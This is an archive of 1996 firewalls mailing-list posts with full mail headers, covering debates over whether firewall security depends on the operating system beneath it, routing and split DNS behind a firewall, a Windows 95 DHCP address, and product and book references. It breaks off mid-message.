Feb 7 16:30:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA08730 for firewalls-outgoing; Wed, 7 Feb 1996 15:44:24 -0800 (PST) Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA08717 for ; Wed, 7 Feb 1996 15:44:17 -0800 (PST) Received: from tsgops.rtp.dg.com by dg-rtp.dg.com (5.4R3.10/dg-rtp-v02) id AA27728; Wed, 7 Feb 1996 18:43:26 -0500 Received: by tsgops.rtp.dg.com (5.4R3.10/200.8.1.3) id AA05372; Wed, 7 Feb 1996 18:43:22 -0500 From: spencerj@dg-rtp.dg.com (Jon Spencer) Message-Id: <9602072343.AA05372@tsgops.rtp.dg.com> Subject: Re: Most Secure Unix? To: weber@iez.com (Rolf Weber) Date: Wed, 7 Feb 1996 18:43:21 -0500 (EST) Cc: spencerj@dg-rtp.dg.com, firewalls@greatcircle.com In-Reply-To: <9601311230.AA16241@spibm02> from "Rolf Weber" at Jan 31, 96 01:30:08 pm X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ... > > So, if a firewall that only protects you against outsiders works perfectly, > > you might reduce your risk by 10%. Won't you feel nice and warm and fuzzy!? > > yes, i feel :-) > if the firewall is properly configured, even insiders can't break the > firewall's security. I think perhaps my point wasn't made clearly. The firewall can only be as good as the OS on which it exists. If your firewall is an application on top of an OS, I can break the firewall by breaking the OS. > > > > > Another problem with firewalls being an application is that the firewall > > then does not really provide much protection for WWW sites. Since you > > can't trust the WWW software to run on the firewall (because you can't > > trust the OS), you must either put the WWW server inside of or outside of > > the firewall. If it is outside, then there is no protection for the WWW > > server (and I am certain that we all know of the home pages that have been > > altered by hackers). If the WWW server is on the inside, then you must > > open a hole for anonymous users in the firewall, thus greatly reducing or > > eliminating any security it might have afforded you. > > how could a firewall protect a WWW server? impossible! > the only 'secure' solution is to place it outside and insure this host as > good as possible. Well, "impossible" is a very big word to use! Especially, since this is exactly what we have. If your assumption is that the firewall is an application, then I do agree with you. That is why the functions of a firewall need to be a base component of a high assurance OS (so you know that they work). Then you run the WWW server on that OS, and you (apparently) have the impossible. :-) > > > > > Bottom line is that the firewall is COMPLETELY dependent upon the security > > provided by the OS for its own security - The firewall can be no more > > secure. If I can break into the OS, the firewall is mine to mangle. More > > on thsi below. > > > > [snip] > > > > Jon F. Spencer spencerj@rtp.dg.com (uunet!rtp.dg.com!spencerj) > > Data General Corp. Phone : (919)248-6246 > > 62 T.W. Alexander Dr, MS #119 FAX : (919)248-6108 > > Research Triangle Park, NC 27709 Office RTP 121/9 > > > on a typical firewall, there only runs: > -the kernel, i never heard of any breakin with the help of a kernel bug > -a few harmless services such as inetd > -the firewall software, often known, sometimes proven to be good > i trust this stuff, but not the configuration of the firewall, even not mine. > if you want a better security as such one, it's surely *not* your OS, it's > simply not to connect at all. > i don't know if your OS is more or less secure as mine. but, IMHO, it doesn't > matter. human failure, that's the point you have to take care. > > rolf It does matter. And so does limiting the effects of human failure, which will always be present. When you make a human SUPER user, you have amplified that users mistakes. So here is one path to travel to limit human mistakes. But this is not the place for a tutorial on how to deal with the REAL risks of a computing environment. Suffice it to say that if you don't deal with them, your firewall won't work, your home page will be violated, and termites will eat your mouse pad. That is why I reassert that if your base OS (including the admin environment) is not high assurance and does not deal with the real threats, your firewall is not very good. Jon From firewalls-owner Wed Feb 7 16:53:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA12762 for firewalls-outgoing; Wed, 7 Feb 1996 16:47:24 -0800 (PST) Received: from alpha2000.tech-comm.com (ns.tech-comm.com [204.251.171.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA12755 for ; Wed, 7 Feb 1996 16:47:20 -0800 (PST) Received: by alpha2000.tech-comm.com; (5.65/1.1.8.2/05Jun95-1217PM) id AA30663; Wed, 7 Feb 1996 18:46:42 -0600 Date: Wed, 7 Feb 1996 18:46:42 -0600 From: Dick Brooks Message-Id: <9602080046.AA30663@alpha2000.tech-comm.com> To: Firewalls@GreatCircle.COM, pcuser@slip67-241.ny.us.ibm.net Subject: Re: Firewalls Product Comparison Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You can find out about IBM's Secure Network Gateway at: http://www.raleigh.ibm.com/sng/sngover.html We used IBM's firewall at one of our customers. It seems to be a high quality product at a reasonable price ($9,999) Dick Brooks dick@tech-comm.com Chief Technical Officer Tel. 205-250-8054 TECH-COMM Inc. WWW URL: http://www.tech-comm.com/ THE ONLY COMPANY OFFERING VISA CERTIFIED INTERNET CREDIT CARD PROCESSING SW From firewalls-owner Wed Feb 7 17:56:12 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA13148 for firewalls-outgoing; Wed, 7 Feb 1996 16:52:34 -0800 (PST) Received: from taz.nda.com ([206.0.206.200]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id QAA13116 for ; Wed, 7 Feb 1996 16:52:24 -0800 (PST) Received: (from kovar@localhost) by taz.nda.com (8.7.3/8.7.3) id QAA14547; Wed, 7 Feb 1996 16:52:27 -0800 (PST) From: David Kovar Message-Id: <199602080052.QAA14547@taz.nda.com> Subject: Re: fw-1 and smapd To: nlehrer@usia.gov (Lehrer Neil) Date: Wed, 7 Feb 1996 16:52:26 -0800 (PST) Cc: firewalls@GreatCircle.COM In-Reply-To: <2C1D19310136C8D1@usia.gov> from "Lehrer, Neil" at Feb 7, 96 05:44:07 pm X-Mailer: ELFrom firewalls-owner Thu Feb 8 02:39:10 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA13430 for firewalls-outgoing; Thu, 8 Feb 1996 02:36:04 -0800 (PST) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id CAA13425 for ; Thu, 8 Feb 1996 02:36:00 -0800 (PST) Message-Id: <199602081036.CAA13425@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA266594928; Thu, 8 Feb 1996 21:22:08 +1100 From: Darren Reed Subject: Re: 0.0.0.0 address on LAN To: gaus@znanost.hr (Damir Rajnovic) Date: Thu, 8 Feb 1996 21:22:08 +1100 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <199602080918.KAA17830@hvar.mzt.hr> from "Damir Rajnovic" at Feb 8, 96 10:18:27 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Damir Rajnovic, sie said: > > Hello, > > Someone ask who produce 0.0.0.0 ip address, answer is Win95 (and NT > maybe - don't have it around so can't be shure). Here is excerpt: > > Client: 0.0.0.0 (null) Server 255.255.255.255 (broadcast) > OpCode 0x01: BOOTREQUEST , MAC Address Type: 1, MAC Address Length: 6 > Hops: 0, XID: 0000AF37, trying since 1024 second(s) > > and that guy have Win95 on his machine. Looks like DHCP trying to work. Check the configuration of the Win95 machine for the DHCP setup. darren From firewalls-owner Thu Feb 8 03:24:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA14974 for firewalls-outgoing; Thu, 8 Feb 1996 03:06:09 -0800 (PST) Received: from cleese.apana.org.au (dotat-gw.apana.org.au [203.14.159.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id DAA14946 for ; Thu, 8 Feb 1996 03:05:41 -0800 (PST) Received: (from newton@localhost) by cleese.apana.org.au (8.7.1/8.7) id VAA06734 for firewalls@greatcircle.com; Thu, 8 Feb 1996 21:40:07 +1030 (CST) Date: Thu, 8 Feb 1996 21:40:07 +1030 (CST) From: Mark Newton Message-Id: <199602081110.VAA06734@cleese.apana.org.au> To: firewalls@greatcircle.com Subject: The "ULTIMATELY secure firewall" web page Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have a need to point out some network security problems to an acquaintance, and thought it'd be effective if I illustrated some of them my pointing him at "The ULTIMATELY secure firewall" page on http://www.iwi.com/pubs/A1firewall.htm. Unfortunately, it seems to have disappeared :-( Can anyone offer me a pointer to the page? Thanks in advance, - mark -------------------------------------------------------------------- I tried an internal modem, newton@cleese.apana.org.au but it hurt when I walked. Mark Newton ----- Voice: +61-8-3732429 --------------- Data: +61-8-3736006 ----- From firewalls-owner Thu Feb 8 03:38:52 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA16054 for firewalls-outgoing; Thu, 8 Feb 1996 03:23:55 -0800 (PST) Received: from amcada.amc.uva.nl (amcada.amc.uva.nl [145.18.204.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id DAA16041 for ; Thu, 8 Feb 1996 03:23:41 -0800 (PST) From: F.Wetzels@amc.uva.nl Received: from eland.amc.uva.nl by amc.uva.nl (PMDF V4.3-7 #2498) id <01I0YY4KV9JK8WWF6C@amc.uva.nl>; Thu, 8 Feb 1996 12:22:03 +1 Received: from amchelix.amc.uva.nl by eland.amc.uva.nl (5.x/SMI-5.0) id AA27114; Thu, 8 Feb 1996 12:21:57 +0100 Received: by amchelix.amc.uva.nl (5.x/SMI-5.0) id AA00997; Thu, 8 Feb 1996 12:21:48 +0100 Date: Thu, 08 Feb 1996 12:21:48 +0100 Subject: Re: routing table go through firewall ? To: firewalls@greatcircle.com Message-id: <9602081121.AA00997@amchelix.amc.uva.nl> X-Envelope-to: firewalls@greatcircle.com MIME-version: 1.0 Content-type: text/plain; charset=us-ascii Content-transfer-encoding: 7bit Content-MD5: 15UJU/sKpFbCd3Wir2vc5w== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk fpmw> I am testing our fw-1 and have got a question before fpmw> implementing our secuity. fpmw> I will use dual homed g/w with fw-1 and connect each ends to the internet fpmw> and our internal network. fpmw> fpmw> Our net -- Router ----- F/W ---- Router -- Internet fpmw> | fpmw> BBS Server ... fpmw> The question is that each router can exchange each routing table or not ? fpmw> If can , How it's possible. ? It can. It depends on what you want. Your turn `rip services' on and off. But it's also possible to do this for igrp, bgp and egp. fpmw> Our network person assumes the G/W with F/W must use rip protocol. fpmw> In our case he won't recommend the rip protocol due to it's heavy traffic. I doubt rip producing much traffic. Normally rip tables are spread once in 30 seconds. fpmw> If it is not possible , please explain in detail how to reach to the fpmw> BBS server from the Our net. In case you're *not* using rip or other routing protocol, You should add static routes on your F/W and internal router. I assumed some IP-adresses on the routers and your BBS station: Your net -------- Router ------------ FW -------+------- Router ------ internet aaa.1 bbb.2 bbb.1 ccc.2 | ccc.1 ddd.2 | | ccc.3 BBS On FW: default via ccc.1 your net via bbb.2 On Router: default via bbb.1 You don't need (musn't) to define a routing rule for directly connect subnets. fpmw> If it must use static routing, how to reach internet just with name from our fpmw> net. Our internal DNS server maintains internal names only and Our policy fpmw> is to let Our net users go out without restriction and Internet users fpmw> be prohibited in some extents. `Internet' should be able to locate the name of your net. A nice solution is an external dns and an internal dns. The FW and the two DNS's should be configured that they communicate (forwarding). But internet sees only two or three machines (the DNS + BBS? + FW(ccc.2)?) The FW should be configured such that only DNS request from your external DNS are allowed and vice versa. In this way DNS informatiosn is available but your net remains invisible (you can allow ping and deny telnet and so on) Frank ------------------------------------------------- F.P.M. Wetzels ADIV/CNS D01-319.1 f.wetzels@amc.uva.nl meibergdreef 15 Voice +31 20 5662916 1105 AZ Amsterdam-ZO Fax +31 20 6973181 ------------------------------------------------- From firewalls-owner Thu Feb 8 03:54:05 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA15153 for firewalls-outgoing; Thu, 8 Feb 1996 03:08:31 -0800 (PST) Received: from iez.com (mail.iez.com [194.218.38.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id DAA15142 for ; Thu, 8 Feb 1996 03:08:14 -0800 (PST) Received: by iez.com (AIX 3.2/UCB 5.64/4.03) id AA09429; Thu, 8 Feb 1996 12:08:02 +0100 Received: from spibm02(172.16.13.62) by iez.com via smap (V1.3) id sma009425; Thu Feb 8 12:07:56 1996 Received: from iez.com by spibm02 (AIX 3.2/UCB 5.64/4.03) id AA12965; Thu, 8 Feb 1996 12:05:50 +0100 Message-Id: <9602081105.AA12965@spibm02> Received: from inhps-a by iez.com with SMTP (1.37.109.4/16.2) id AA29495; Thu, 8 Feb 96 12:05:48 +0100 Received: by inhps-a (1.38.193.3/16.2) id AA07866; Thu, 8 Feb 96 12:05:46 +0100 From: Rolf Weber Subject: Re: Most Secure Unix? To: spencerj@dg-rtp.dg.com (Jon Spencer) Date: Thu, 8 Feb 1996 12:05:46 +0100 (MEZ) Cc: firewalls@greatcircle.com (firewalls) In-Reply-To: <9602072343.AA05372@tsgops.rtp.dg.com> from "Jon Spencer" at Feb 7, 96 06:43:21 pm X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > I think perhaps my point wasn't made clearly. The firewall can only be as > good as the OS on which it exists. If your firewall is an application > on top of an OS, I can break the firewall by breaking the OS. > i never heard of any breakin possible because of a kernel bug. may be i'm wrong, may be it's possible, but i cannot imagine. > > Well, "impossible" is a very big word to use! Especially, since this is > exactly what we have. If your assumption is that the firewall is an > application, then I do agree with you. That is why the functions of a > firewall need to be a base component of a high assurance OS (so you know > that they work). Then you run the WWW server on that OS, and you (apparently) > have the impossible. :-) > i don't trust *no* WWW server on *no* OS. > > It does matter. And so does limiting the effects of human failure, which will > always be present. When you make a human SUPER user, you have amplified > that users mistakes. So here is one path to travel to limit human mistakes. > But this is not the place for a tutorial on how to deal with the REAL risks > of a computing environment. Suffice it to say that if you don't deal with > them, your firewall won't work, your home page will be violated, and > termites will eat your mouse pad. > > That is why I reassert that if your base OS (including the admin environment) > is not high assurance and does not deal with the real threats, your > firewall is not very good. > i fear this will go to an endless discussion... IMHO, it's senseless to discuss which OS is secure and which not. how will you prove it? my company is a softwarehouse, and we are using a lot of different UNIXes. a few years ago, we got a new OS which was announced to be a C2 system. /etc/passwd was owned by 'bin'! every host which appeared in /etc/hosts.equiv could modify it. i had a really great ROTFL and stopped even thinking about security classifications. i know about my configuration, i know how far i can trust it and where the (possible) vulnerabilities are. that's the most important. may be a ''high security UNIX`` is useful on a multiuser system. on a firewall, where root should be the only user, it doesn't hurt, that's all. rolf -- ----------------------------------------- Rolf Weber | All I ask is a chance IEZ AG D-64625 Bensheim | to prove that money ++49-6251-1309-113 | can't make me happy. From firewalls-owner Thu Feb 8 04:39:47 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA19107 for firewalls-outgoing; Thu, 8 Feb 1996 04:25:01 -0800 (PST) Received: from cbisgate.cbis.com (cbisgate.cbis.com [155.90.248.205]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA19094 for ; Thu, 8 Feb 1996 04:24:53 -0800 (PST) Received: from notes.cbis.com by cbisgate.cbis.com (5.x/SMI-SVR4) id AA19567; Thu, 8 Feb 1996 07:23:59 -0500 Received: by notes.cbis.com (IBM OS/2 SENDMAIL VERSION 1.3.14/2.12um) id AA0290; Thu, 08 Feb 96 07:24:32 -0500 Message-Id: <9602081224.AA0290@notes.cbis.com> Received: from CBIS with "Lotus Notes Mail Gateway for SMTP" id 68D97D4CC72345E7852562CA0042B92C; Thu, 8 Feb 96 07:24:25 To: security , firewalls-digest From: Warren Moore Date: 8 Feb 96 7:15:10 Subject: Security Policies Made Easy X-Importance: High Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk My mailer thinks Bruno Mamer said: >Just a small question, last August, "Jim Carroll" talked of the book >"Information Security Policies Made Easy". > >We've decided to buy it but lack references. Does anyone have the editor, >ISBN number ? Not precisely, but this should do: Author: Charles Cresson Wood Publisher: Baseline Software, Sausalito, CA Tel: 415-332-7763 FAX: 415-332-8032 Warren S. Moore, CISSP Information Security Specialist Cincinnati Bell Information Systems Inc. From firewalls-owner Thu Feb 8 04:54:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA19316 for firewalls-outgoing; Thu, 8 Feb 1996 04:28:55 -0800 (PST) Received: from ns.gbnet.net (ns.gbnet.net [194.70.126.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id EAA19293 for ; Thu, 8 Feb 1996 04:28:44 -0800 (PST) Received: (from jrg@localhost) by ns.gbnet.net (8.7.3/8.6.12) id MAA01584; Thu, 8 Feb 1996 12:26:33 GMT Date: Thu, 8 Feb 1996 12:26:33 GMT From: James R Grinter Message-Id: <199602081226.MAA01584@ns.gbnet.net> X-Subliminal: H is for Hypertext X-Mailer: Mail User's Shell (7.2.5 10/14/92) To: "Jason L. Haar" Subject: Re: anybody know of any vulnerabilities with "echo" Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu 8 Feb, 1996, "Jason L. Haar" wrote: >I wonder, this smells heavily of the "Harverst cache Web server". >Harvest uses some pretty wild checks on upstream web sites to see if >they're up or not - the default is to "ping" the host using UDP echo >packets - that could be what you're seeing. > >Of course, it goes without saying that such sites shouldn't set up such >things without ASKING those sites first... The reason it can be configured to send those UDP packets (but *isn't* by default) is to attempt to determine if it will be quicker to fetch the file from source rather than going through its cache hierarchy. If you don't want people to be able to retrieve things quickly from your web server where possible... James. From firewalls-owner Thu Feb 8 05:23:53 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA20306 for firewalls-outgoing; Thu, 8 Feb 1996 04:45:50 -0800 (PST) Received: from cbisgate.cbis.com (cbisgate.cbis.com [155.90.248.205]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA20280 for ; Thu, 8 Feb 1996 04:45:33 -0800 (PST) Received: from notes.cbis.com by cbisgate.cbis.com (5.x/SMI-SVR4) id AA19939; Thu, 8 Feb 1996 07:44:09 -0500 Received: by notes.cbis.com (IBM OS/2 SENDMAIL VERSION 1.3.14/2.12um) id AA0382; Thu, 08 Feb 96 07:44:41 -0500 Message-Id: <9602081244.AA0382@notes.cbis.com> Received: from CBIS with "Lotus Notes Mail Gateway for SMTP" id 9BBFD18CE5F0EF95852562CA0043C751; Thu, 8 Feb 96 07:44:41 To: firewalls-digest From: Warren Moore Date: 8 Feb 96 7:42:42 Subject: I want details!!! Re: NT's TCP/IP stack X-Importance: High Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 7 Feb 1996 13:23:28 -0600 (CST), my mailer thinks that Robert Dana said: >One of the most valuable things about forums like this is the potential to >share information that cuts through all the BS that floats around out there in >the form of marketing materials and vendor-biased trade publications. I'm >constantly disappointed about how little valuable knowledge is really posted. >And please- keep your OS religion to yourself. Sure, UNIX is what I'm most >comfortable with for now, but that doesn't change the fact that I have to deal >with NT whether I want to or not. GIVE US FACTS. One small voice of sanity...hooray! Ladies & gents, the vast majority of you who post to this list give all the appearances of really knowing your stuff...which is a great help to those of us who are NOT networking geeks, but some other sort of geek (IBM Mainframe/